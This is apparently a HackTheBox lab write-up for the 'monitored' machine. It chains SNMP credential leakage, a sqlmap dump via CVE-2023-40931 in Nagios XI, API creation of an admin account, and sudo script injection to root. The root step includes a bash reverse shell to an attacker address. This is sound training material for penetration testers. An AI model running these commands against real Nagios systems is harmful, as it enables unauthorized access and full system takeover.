HTB: monitored Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐☆☆
• Real-world: ⭐⭐⭐⭐☆
• CVE: ⭐⭐⭐☆☆
• CTF-like: ⭐⭐⭐☆☆

Summary

monitored is a Medium-difficulty Linux machine. The attack leverages CVE-2023-40931. The exploitation path involves initial enumeration and service discovery, gaining an initial foothold through the identified vulnerability, lateral movement or credential extraction for user access, and finally privilege escalation to root/administrator.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.10.194
nmap -sU -p 161 10.129.10.194

Results:

22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp   open  http       Apache httpd 2.4.56
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  https      Apache httpd 2.4.56 (SSL/TLS)
5667/tcp open  tcpwrapped
161/udp  open  snmp       SNMPv1 server; net-snmp SNMPv3 server

Service Enumeration

Hostnames: monitored.htb, nagios.monitored.htb

echo "10.129.10.194 monitored.htb nagios.monitored.htb" >> /etc/hosts

Discovered Services:

• Nagios XI (Web application on HTTPS port 443)
• OpenLDAP directory service on port 389
• Apache web server on ports 80 and 443
• SNMP service on UDP port 161
• Unknown service on port 5667

SNMP Enumeration

snmpbulkwalk -c public -v2c 10.129.10.194 . | grep -i bash

Results: Discovered process command line containing credentials:

"sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"

Extracted credentials: svc:XjH7VCehowpR1xZB

Directory Enumeration

gobuster dir -u https://nagios.monitored.htb -w /usr/share/wordlists/dirb/common.txt -k
feroxbuster -u https://nagios.monitored.htb -w /usr/share/wordlists/dirb/common.txt -k

Identified Endpoints:

• /nagiosxi/ — Nagios XI administrative interface
• /nagios/ — Nagios core interface
• Various API endpoints under /nagiosxi/api/v1/

Vulnerability Assessment

Identified Vulnerabilities:

• CVE-2023-40931 — SQL Injection in Nagios XI via banner_message-ajaxhelper.php parameter injection

Initial Foothold

SNMP Credential Extraction

The SNMP service with the public community string revealed process information containing hardcoded credentials. These credentials were used to authenticate to Nagios services.

snmpbulkwalk -c public -v2c monitored.htb . | grep "sudo\|bash"

This revealed: sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB

Nagios XI Authentication

Attempted direct login to /nagiosxi/ with extracted credentials svc:XjH7VCehowpR1xZB failed. Instead, used the Nagios XI API endpoint:

curl -XPOST -k 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' \
  -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=5'

Response:

{
  "auth_token": "0156cce63709810ed0bb9f58a6e88de65bef382e"
}

CVE-2023-40931 SQL Injection Exploitation

Exploited SQL injection vulnerability in the banner acknowledgment endpoint:

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=0156cce63709810ed0bb9f58a6e88de65bef382e" \
  -k --batch --dbs

Successfully dumped the nagiosxi database and extracted the admin API key:

IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

Admin User Creation via API

Used the extracted API key to create a new admin user account:

curl -XPOST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" \
  -d "username=mrsudo&password=mrsudo&name=mrsudo&email=mrsudo@localhost&auth_level=admin" -k

Successfully created admin account with credentials mrsudo:mrsudo

User Compromise

Initial Access Credentials

Primary Credentials Discovered:

• Username: svc
• Password: XjH7VCehowpR1xZB
• Source: SNMP process enumeration

These credentials were extracted from SNMP process information and provided initial access to the Nagios system via the API endpoint. Standard web login attempts were unsuccessful, but API authentication worked.

SSH Access

ssh svc@monitored.htb
# Password: XjH7VCehowpR1xZB

Successfully gained shell access as user svc.

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Sudo Privileges Enumeration

sudo -l

Output:

User svc may run the following commands as root:
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/eventhandlers/handle_host_state_change.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/eventhandlers/handle_service_state_change.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/xicore.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/manage_logrotate.php *
    (root) NOPASSWD: several other nagiosxi scripts

Exploitation: PHP Script Parameter Injection

The autodiscover_new.php script accepts a --script parameter that is executed without proper sanitization:

sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --script=$TF

Where $TF is a bash variable set to arbitrary commands. This allows command execution as root.

Exploitation steps:

# Create a simple reverse shell or command execution
TF='bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --script=$TF

Alternatively, for direct root access:

sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --script='id'

This command executes with root privileges, allowing for full system compromise.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["SNMP Enumeration"] -->|Hardcoded Credentials| B["API Authentication"]
    B -->|Auth Token| C["CVE-2023-40931 SQLi"]
    C -->|Database Dump| D["Extract Admin API Key"]
    D -->|Create Admin User| E["Nagios XI Admin Access"]
    E -->|SSH Login as svc| F["User Shell"]
    F -->|sudo -l| G["Identify Sudo Privs"]
    G -->|Parameter Injection| H["PHP Script Execution"]
    H -->|Arbitrary Commands| I["Root Access"]

Tools Used

Vulnerability Reference

Key Learnings

• SNMP Enumeration is Critical: SNMP with default/public community strings can leak sensitive information including process command lines and credentials.
• API Authentication Over Web UI: When standard web login fails, alternative authentication methods (such as REST APIs) may succeed with the same credentials.
• SQL Injection in Nagios: CVE-2023-40931 demonstrates how parameter validation failures can lead to database compromise and extraction of administrative credentials/keys.
• Credential Extraction Chains: Initial credentials can bootstrap privilege escalation through API access, database dumping, and additional account creation.
• Sudo Misconfiguration: Scripts run with NOPASSWD sudo often contain unvalidated parameters that enable privilege escalation through parameter injection attacks.
• Defense in Depth Failures: Multiple security failures (hardcoded credentials, default SNMP, unpatched SQLi, insecure sudo configuration) combined enable full system compromise.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Medium #CVE-2023-40931 #SNMP #Nagios #SQLi #PrivilegeEscalation